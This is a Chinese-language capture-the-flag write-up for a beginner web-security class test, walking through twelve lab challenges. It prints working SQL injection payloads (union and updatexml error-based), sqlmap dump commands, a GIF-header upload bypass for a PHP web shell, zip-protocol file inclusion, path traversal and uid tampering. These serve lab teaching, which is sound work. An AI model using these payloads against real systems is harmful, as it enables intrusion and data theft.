寒假web(基础班)ctf结营小测试wp

1.Flag参数

题目提示随便用flag值作为post的值。

那么随便post一个值


flag的值大于十位就可以得到flag了




2.input

(提交的内容即为答案)
1.查看源代码,发现str值即为flag



2.用控制台跑一下脚本



拿下flag

3.企业小白运维人员

(有些企业小白运维人员会在服务器上直接做文件备份,比如将一个.php文件备份成.php.bak文件。)
1.访问index.php.bak文件,查看源码。



2.get传值user值和password值即可得flag



4.100块钱都不给我

1.后台扫一扫,去读robots.txt文件



2.得到robots.txt的提示,其访问index.php1文件


image.png

3.得到提示,发现ctf值会成为函数名执行,get传值,执行phpinfo();.


5.搜what?


初步判断是SQL注入,大家应该知道手注,而且这是post传值,这次教大家用sqlmap工具

手注方式:

word=1'or 1=1 order by 3#&&number=5查询字段数为3
word=1'or 1=1 union select 1,2,3#&&number=5发现三个字段都有回显
word=1'or 1=1 union select 1,database(),3 #&number=1爆数据库,为news
word=1' union select 1,table_name,3 from information_schema.tables where table_schema=database()#&number=5
发现表名admin
word=1' union select 1,column_name,3 from information_schema.columns where table_name='admin'#&number=5找到flag
word=1' union select 1,flag,3 from admin#&number=5

sqlmap:
1.burp抓包,保存消息头,或者直接send to sqlmap(已给burp装sqlmap插件的情况下)
2.payload(***为文件路径)(保存消息头到虚拟机跑的)
sqlmap -r"***/1.txt" -p word --current-db
sqlmap -r"***/1.txt" -p word -D news --tables
sqlmap -r"***/1.txt" -p word -D news -T admin --columns
sqlmap -r"***/1.txt" -p word -D news -T admin -C flag --dump


6.来上传


看来要上传一句话木马才能得到flag
1.随便传个php文件试试



2.看来要上传gif文件,试试改文件后缀名(亲测也不行)
3.试试幻数绕过(burp抓包改文件头)


小技巧:如果你不知道gif文件头是啥,要先传真的gif文件,可以看见文件头是GIF98a,把GIF89a文件头后的内容换成一句话木马,再把文件后缀改成php。


7.包罗万象

1.上传包含有一句话木马文件的zip,回显给绝对路径
2.用zip协议的方式访问,post传值,读取flag.php文件,得到flag。


tips:由于flag.php文件不能直接cat方式读取,这里用base64的方式读取flag.php文件,直接回显flag值的base64值,decode即可。


8.啊!核弹!

1.页面有flag字样,点击提示没有权限
2.burp 抓包,发现uid值得post传值


uid=1000

发现给的目录是owner_bugs
3.改uid的值为1的时候


uid=1.png

发现flag字样
3.直接访问flag目录即可
flag’

tips:本题考察的是linux的越权控制,在登录Linux时,看起来是登录的账号,其实在计算机中仅仅认识ID,而每个登录的用户都会取得两个
ID这就是GID与UID。UID也称为用户ID(UserID),GID也称为用户组ID(Group ID)。操作系统就是利用它两来判断文件的所有者与用户组的。用户的UID大于500的都是非系统账号,500以下的都为系统保留的账号,比如root账号,至高权限的账号的UID为0。参考:https://www.jianshu.com/p/b221ee13bf89


9.这密码到底是啥?

手注:报错注入的方式
1.user=Username' and updatexml(1,concat(1,database(),0x7e),1)#
2.Username' and updatexml(1,concat(1,(select table_name from information_schema.tables where table_schema='manager_haha' LIMIT 0,1),0x7e),1)#
3.user=Username' and updatexml(1,concat(1,(select column_name from information_schema.columns where table_name='admin' limit 3,1),0x7e),1)#他这里回显只能一个一个文件爆库,所以要用limit一个一个找
4.user=Username' and updatexml(1,concat(1,(select f149_k3y from admin),0x7e),1)#

1.初步猜想是sql注入。

index.php

2.抓包直接SQLmap跑(对于post值中的user值进行注入)
(然而我是不行的,https://www.jianshu.com/p/b221ee13bf89,这文章的大佬可以)think:可能跟题目中有个js脚本关系,它是检测你的user值,要纯字母,开noscrip可以手注报错注入,但sqlmap就不行(之后我再想想)


10.dota

后台发现www.zip,下载文件,直接可读flag,但这不是预期解,这题考的是代码审计。

index.php

他这过滤了英文字符,防止我们直接去读flag。
这里想到linux命令下的*字符,url/index.php?act=news&nid=../*直接读所有文件,审查元素即可得到flag。


11.看你有什么办法

1.根据源码中的提示,访问index.bak
2.index.bak中发现file协议没有被过滤



3.直接用file协议读flag,但是这里貌似过滤了ip。

web中用到file协议需要直接访问绝对路径下的文件才能
example:file://(绝对路径)/(文件名)

这里用localhost代替ip地址,直接读flag


12.X集团超级无敌新闻网站

1.点击页面中随便一条新闻,猜测url有注入点,sql一跑——并没有
2.扫后台,发现admin后台,需要密码,还有一个left.jps文件
3.访问left.jps,需要开启noscript


left.jps

4.直接点击flag是没有的,在新闻管理中随便编辑文章有个注入点
sqlmap去得到登录密码
5.获取flag


password

get flag
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 159,835评论 4 364
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 67,598评论 1 295
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 109,569评论 0 244
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 44,159评论 0 213
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,533评论 3 287
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,710评论 1 222
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,923评论 2 313
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,674评论 0 203
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,421评论 1 246
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,622评论 2 245
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,115评论 1 260
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,428评论 2 254
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,114评论 3 238
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,097评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,875评论 0 197
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,753评论 2 276
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,649评论 2 271

推荐阅读更多精彩内容

  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
    xuningbo阅读 10,147评论 2 22
  • sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 1,945评论 0 5
  • 一套实用的渗透测试岗位面试题,你会吗? 1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源...
    g0阅读 4,692评论 0 9
  • Flag参数 解题步骤根据题目提示,通过POST的方式传递flag参数,回显参数的值需要大于10位,因此传递大于1...
    蓝小俊阅读 6,315评论 0 1
  • 签到2 地址:来源:网络攻防大赛 说了输入zhimakaimen,开始输入没认真看,只能输入10个数字,可是zhi...
    JasonChiu17阅读 4,663评论 0 9